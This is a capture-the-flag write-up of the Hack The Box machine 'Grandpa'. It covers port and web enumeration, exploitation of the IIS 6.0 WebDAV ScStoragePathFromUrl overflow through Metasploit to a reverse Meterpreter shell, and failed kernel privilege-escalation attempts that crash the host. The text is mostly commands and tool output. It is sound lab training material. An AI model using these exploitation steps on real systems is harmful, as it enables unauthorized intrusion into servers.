Grandpa
Starting with a port scan.
root@n0w4n:~/opt/htb/grandpa# nmap -T4 -n -sS -sV -sC -p- 10.10.10.14
Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-27 14:09 CEST
Nmap scan report for 10.10.10.14
Host is up (0.027s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods:
|_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
|   Server Type: Microsoft-IIS/6.0
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   WebDAV type: Unkown
|   Server Date: Wed, 27 Jun 2018 12:11:04 GMT
|_  Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 115.49 seconds
root@n0w4n:~/opt/tools/dirsearch# python3 dirsearch.py -u http://10.10.10.14/ -e php,txt -x 403,404

 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )

Extensions: php, txt | Threads: 10 | Wordlist size: 6344

Error Log: /root/opt/tools/dirsearch/logs/errors-18-06-27_14-12-39.log

Target: http://10.10.10.14/

[14:12:39] Starting:
[14:12:49] 301 -  155B - /_vti_bin  ->  http://10.10.10.14/%5Fvti%5Fbin/
[14:12:49] 200 -    2KB - /_vti_inf.html
[14:12:49] 200 -  195B - /_vti_bin/_vti_aut/author.dll
[14:12:49] 200 -  195B - /_vti_bin/_vti_adm/admin.dll
[14:12:49] 200 -  106B - /_vti_bin/shtml.exe/qwertyuiop
[14:12:49] 200 -  105B - /_vti_bin/shtml.dll/asdfghjkl
[14:12:49] 200 -   96B - /_vti_bin/shtml.exe?_vti_rpc
[14:12:49] 200 -   96B - /_vti_bin/shtml.dll
[14:12:49] 500 -  112B - /_vti_pvt/
[14:12:49] 500 -  112B - /_vti_pvt/administrator.pwd
[14:12:49] 500 -  112B - /_vti_pvt/authors.pwd
[14:12:49] 500 -  112B - /_vti_pvt/administrators.pwd
[14:12:49] 500 -  112B - /_vti_pvt/shtml.exe
[14:12:49] 500 -  112B - /_vti_pvt/service.pwd
[14:12:49] 500 -  112B - /_vti_pvt/users.pwd
[14:13:07] 301 -  149B - /Images  ->  http://10.10.10.14/Images/
[14:13:07] 301 -  149B - /images  ->  http://10.10.10.14/images/
[14:13:13] 200 -    2KB - /postinfo.html

Task Completed
root@n0w4n:~/opt/htb/grandpa# nikto -h http://10.10.10.14
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.14
+ Target Hostname:    10.10.10.14
+ Target Port:        80
+ Start Time:         2018-06-27 14:16:36 (GMT2)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/6.0
+ Retrieved microsoftofficewebserver header: 5.0_Pub
+ Retrieved x-powered-by header: ASP.NET
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'microsoftofficewebserver' found, with contents: 5.0_Pub
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-aspnet-version header: 1.1.4322
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Retrieved dasl header: <DAV:sql>
+ Retrieved dav header: 1, 2
+ Retrieved ms-author-via header: MS-FP/4.0,DAV
+ Uncommon header 'ms-author-via' found, with contents: MS-FP/4.0,DAV
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5647: HTTP method ('Allow' Header): 'MOVE' may allow clients to change file locations on the web server.
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
+ OSVDB-5646: HTTP method ('Public' Header): 'DELETE' may allow clients to remove files on the web server.
+ OSVDB-397: HTTP method ('Public' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5647: HTTP method ('Public' Header): 'MOVE' may allow clients to change file locations on the web server.
+ WebDAV enabled (SEARCH PROPFIND LOCK UNLOCK COPY PROPPATCH MKCOL listed as allowed)
+ OSVDB-13431: PROPFIND HTTP verb may show the server's internal IP address: http://10.10.10.14/
+ OSVDB-396: /_vti_bin/shtml.exe: Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe/aux.htm -- a DoS was not attempted.
+ OSVDB-3233: /postinfo.html: Microsoft FrontPage default file found.
+ OSVDB-3233: /_vti_bin/shtml.exe/_vti_rpc: FrontPage may be installed.
+ OSVDB-3233: /_vti_inf.html: FrontPage/SharePoint is installed and reveals its version number (check HTML source for more information).
+ OSVDB-3500: /_vti_bin/fpcount.exe: Frontpage counter CGI has been found. FP Server version 97 allows remote users to execute arbitrary system commands, though a vulnerability in this version could not be confirmed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1376. http://www.securityfocus.com/bid/2252.
+ OSVDB-67: /_vti_bin/shtml.dll/_vti_rpc: The anonymous FrontPage user is revealed through a crafted POST.
+ /_vti_bin/_vti_adm/admin.dll: FrontPage/SharePoint file found.
+ /_vti_bin/_vti_adm/admin.exe: FrontPage/Sharepoint file available.
+ /_vti_bin/_vti_aut/author.exe: FrontPage/Sharepoint file available.
+ /_vti_bin/_vti_aut/author.dll: FrontPage/Sharepoint file available.
+ 7499 requests: 0 error(s) and 31 item(s) reported on remote host
+ End Time:           2018-06-27 14:20:53 (GMT2) (257 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@n0w4n:~/opt/tools/dirsearch# searchsploit webdav
------------------------------------------------------------------------------------------ ----------------------------------------
 Exploit Title                                                                            |  Path
                                                                                          | (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------ ----------------------------------------
Apache 1.3.12 - WebDAV Directory Listings                                                 | exploits/linux/remote/20210.txt
Apache JackRabbit - WebDAV XML External Entity                                            | exploits/java/webapps/37110.py
Apache Tomcat - 'WebDAV' Remote File Disclosure                                           | exploits/multiple/remote/4530.pl
Apache Tomcat - WebDAV SSL Remote File Disclosure                                         | exploits/linux/remote/4552.pl
Copy to WebDAV 1.1 iOS - Multiple Vulnerabilities                                         | exploits/ios/webapps/27655.txt
Liferay 6.0.x - WebDAV File Reading                                                       | exploits/multiple/remote/18763.txt
Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow                                        | exploits/windows/remote/1.c
Microsoft IIS - WebDAV Write Access Code Execution (Metasploit)                           | exploits/windows/remote/16471.rb
Microsoft IIS - WebDAV XML Denial of Service (MS04-030)                                   | exploits/windows/dos/585.pl
Microsoft IIS - WebDav 'ScStoragePathFromUrl' Remote Overflow (Metasploit)                | exploits/windows/remote/41992.rb
Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow (1)| exploits/windows/remote/22365.pl
Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow (2)| exploits/windows/remote/22366.c
Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow (3)| exploits/windows/remote/22367.txt
Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow (4)| exploits/windows/remote/22368.txt
Microsoft IIS 5.0 - WebDAV 'ntdll.dll' Path Overflow (MS03-007) (Metasploit)              | exploits/windows/remote/16470.rb
Microsoft IIS 5.0 - WebDAV Denial of Service                                              | exploits/windows/dos/20664.pl
Microsoft IIS 5.0 - WebDAV Lock Method Memory Leak Denial of Service                      | exploits/windows/dos/20854.txt
Microsoft IIS 5.0 - WebDAV PROPFIND / SEARCH Method Denial of Service                     | exploits/windows/dos/22670.c
Microsoft IIS 5.0 - WebDAV Remote                                                         | exploits/windows/remote/2.c
Microsoft IIS 5.0 - WebDAV Remote Code Execution (3) (xwdav)                              | exploits/windows/remote/51.c
Microsoft IIS 5.1 - WebDAV HTTP Request Source Code Disclosure                            | exploits/windows/remote/26230.txt
Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow                  | exploits/windows/remote/41738.py
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (1)                               | exploits/windows/remote/8704.txt
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (2)                               | exploits/windows/remote/8806.pl
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (PHP)                             | exploits/windows/remote/8765.php
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (Patch)                           | exploits/windows/remote/8754.patch
Microsoft Windows - WebDAV Remote Code Execution (2)                                      | exploits/windows/remote/36.c
Microsoft Windows 7 - 'WebDAV' Local Privilege Escalation (MS16-016) (2)                  | exploits/windows/local/39788.txt
Microsoft Windows 7 SP1 (x86) - 'WebDAV' Local Privilege Escalation (MS16-016) (1)        | exploits/windows_x86/local/39432.c
Microsoft Windows 7 SP1 - 'mrxdav.sys' WebDAV Privilege Escalation (MS16-016) (Metasploit)| exploits/windows/local/40085.rb
Microsoft Windows 8.1 - Local WebDAV NTLM Reflection Privilege Escalation                 | exploits/windows/local/36424.txt
Neon WebDAV Client Library 0.2x - Format String                                           | exploits/linux/dos/23999.txt
Nginx 0.7.61 - WebDAV Directory Traversal                                                 | exploits/multiple/remote/9829.txt
Sun Java System Web Server 6.1/7.0 - WebDAV Format String                                 | exploits/multiple/dos/33560.txt
Sun Java Web Server - System WebDAV OPTIONS Buffer Overflow (Metasploit)                  | exploits/multiple/remote/16314.rb
WebDAV - Application DLL Hijacker (Metasploit)                                            | exploits/windows/remote/16550.rb
XAMPP - WebDAV PHP Upload (Metasploit)                                                    | exploits/windows/remote/18367.rb
------------------------------------------------------------------------------------------ ----------------------------------------
------------------------------------------------------------------------------------------ ----------------------------------------
 Shellcode Title                                                                          |  Path
                                                                                          | (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------ ----------------------------------------
Windows/x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes) | shellcodes/windows_x86/39519.c
------------------------------------------------------------------------------------------ ----------------------------------------
OK, that is enough enumeration. The target is IIS 6.0 with WebDAV enabled, and searchsploit lists a remote buffer overflow in the WebDAV ScStoragePathFromUrl function for exactly that version (CVE-2017-7269, exploit 41738.py), together with a Metasploit module (exploit/windows/iis/iis_webdav_scstoragepathfromurl). The module has a single target, Windows Server 2003 R2 SP2 x86, and only the physical path length is brute-forced, so there is little to configure beyond RHOST.
msf exploit(windows/iis/iis_webdav_scstoragepathfromurl) > options

Module options (exploit/windows/iis/iis_webdav_scstoragepathfromurl):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   MAXPATHLENGTH  60               yes       End of physical path brute force
   MINPATHLENGTH  3                yes       Start of physical path brute force
   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                           yes       The target address
   RPORT          80               yes       The target port (TCP)
   SSL            false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI      /                yes       Path of IIS 6 web application
   VHOST                           no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   Microsoft Windows Server 2003 R2 SP2 x86

msf exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set rhost 10.10.10.14
rhost => 10.10.10.14
msf exploit(windows/iis/iis_webdav_scstoragepathfromurl) > exploit -j
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 10.10.14.2:4444
msf exploit(windows/iis/iis_webdav_scstoragepathfromurl) >
[*] Sending stage (179779 bytes) to 10.10.10.14
[*] Meterpreter session 1 opened (10.10.14.2:4444 -> 10.10.10.14:1142) at 2018-06-27 14:31:41 +0200
meterpreter > sysinfo
Computer        : GRANPA
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Domain          : HTB
Logged On Users : 3
Meterpreter     : x86/windows
meterpreter > shell
[-] Failed to spawn shell with thread impersonation. Retrying without it.
Process 2212 created.
Channel 2 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

c:\windows\system32\inetsrv>whoami
whoami
nt authority\network service
meterpreter > dir
Listing: c:\Documents and Settings
==================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
40777/rwxrwxrwx   0     dir   2017-04-12 16:12:15 +0200  Administrator
40777/rwxrwxrwx   0     dir   2017-04-12 16:03:34 +0200  All Users
40777/rwxrwxrwx   0     dir   2017-04-12 16:04:48 +0200  Default User
40777/rwxrwxrwx   0     dir   2017-04-12 16:32:01 +0200  Harry
40777/rwxrwxrwx   0     dir   2017-04-12 16:08:32 +0200  LocalService
40777/rwxrwxrwx   0     dir   2017-04-12 16:08:31 +0200  NetworkService
meterpreter > background
[*] Backgrounding session 1...
msf exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use post/multi/recon/local_exploit_suggester
msf post(multi/recon/local_exploit_suggester) > options

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.14 - Collecting local exploits for x86/windows...
[*] 10.10.10.14 - 39 exploit checks are being tried...
[+] 10.10.10.14 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
The suggester lists a few candidates. The box behaves somewhat unstably: getting the previous session already took several tries. Eventually I had a Meterpreter session again and ran one of the suggested modules against it.
msf exploit(windows/local/ms14_070_tcpip_ioctl) >
[*] Storing the shellcode in memory...
[*] Triggering the vulnerability...
[*] Checking privileges after exploitation...
[+] Exploitation successful!
[*] 10.10.10.14 - Meterpreter session 1 closed.  Reason: Died
And for the sixth time in a row the process hangs. What is wrong with this machine? One thing worth keeping in mind: ms14_070_tcpip_ioctl, like the other modules the suggester marked as "appears to be vulnerable" (ms14_058, ms15_051, ppr_flatten_rec), is a kernel exploit. When one of those goes wrong it does not just kill the Meterpreter session, it can take the whole host down, which is consistent with what the next scan shows.
root@n0w4n:~/opt/htb/grandpa# nmap -n -T4 -sS 10.10.10.14
Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-27 21:22 CEST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 2.14 seconds
Looks like the machine is down. Because I have already reset this machine twice, I think it is a bit off. Maybe I will look at it some other time, but for now I will give it a rest and start a new machine.